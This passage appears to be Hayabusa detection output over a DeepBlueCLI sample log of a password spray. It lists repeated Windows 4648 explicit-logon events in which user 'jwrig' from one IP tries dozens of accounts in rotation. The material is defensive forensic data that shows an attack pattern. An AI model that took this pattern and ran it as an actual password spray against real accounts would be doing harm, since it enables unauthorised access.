DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP 